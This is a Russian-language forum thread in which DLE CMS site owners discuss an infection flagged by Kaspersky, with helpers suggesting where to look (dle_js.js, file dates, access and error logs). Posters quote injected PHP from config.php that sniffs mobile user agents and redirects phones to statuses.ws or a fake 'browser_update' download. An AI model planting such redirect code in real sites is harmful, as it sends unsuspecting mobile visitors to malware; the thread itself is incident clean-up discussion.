Форум Сайтостроение Безопасность

Вирус на сайте cms dle

12345678 ...61
SK
На сайте с 25.01.2012
Offline
19
super_keks
112082

Здравствуйте!

Со вчерашнего дня при заходе на сайты (cms всех сайтов dle от 9.3 до 9.7) с помощью браузера opera, KIS 2013 выводит предупреждение (скриншот http://smotr.im/awTn). На других сайтах на этом хостинге та же проблема. В браузера google chrome такой проблемы не замечено. Отписал саппорту касперского и получил ответ "...statuses.ws/googleanalisys.js - является мобильным зловредом". По сайту пошерстил и подозрительных новых файлов не обнаружил.

На одном сайте в config.php внизу нашел код:

if ($android === true) {

header('Location: http://file07.com/browser_update/215/browser_update')

}

После его удаления АВП так и продолжает реагировать.

Если кто сталкивался прошу подсказать.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#1

урл покажите. или statuses.ws?

p.s. могу помочь очистить.

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
SK
На сайте с 25.01.2012
Offline
19
super_keks
#2
kgtu5:
урл покажите. или statuses.ws?

p.s. могу помочь очистить.

к примеру один из сайтов realdiz.ru

SK
На сайте с 25.01.2012
Offline
19
super_keks
#3

Тема закрыта, kgtu5 - помог с проблемой.

Bra1ner1ck
На сайте с 23.12.2007
Offline
91
Bra1ner1ck
#4

Может напишите здесь где копать данную строку для удаления?

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#5

файл dle_js.js

Bra1ner1ck
На сайте с 23.12.2007
Offline
91
Bra1ner1ck
#6

спасибо, а неподскажите как искать такого рода вирусы? просто до этого как то привык шерстить исходный код т.к в нём отображается всё. и обычно этого хватало, а так я бы врятли когда нашёл, проверил всякими онлайн антивирусами - бестолку. только каспер палил, но он не показывал всю цепочку до файла.

SK
На сайте с 25.01.2012
Offline
19
super_keks
#7

Сегодня нашел в config.php

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");

$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");

$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");

$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {

header('Location: http://statuses.ws/');

как лезут незнаю...

Plazik
На сайте с 29.07.2008
Offline
161
Plazik
#8

Смотрите логи доступа и php.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#9

смотри дату и время изменения файла, потом в access.log и error.log искать использованный запрос...

R
На сайте с 24.01.2008
Offline
180
Алексей
#10
super_keks:
Сегодня нашел в config.php

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');

как лезут незнаю...

ТС, вам вроде уже лечил kgtu5 не вылечил?

super_keks:
Тема закрыта, kgtu5 - помог с проблемой.

Я так понимаю он вам просто убрал причину, но не источник.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
12345678 ...61

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий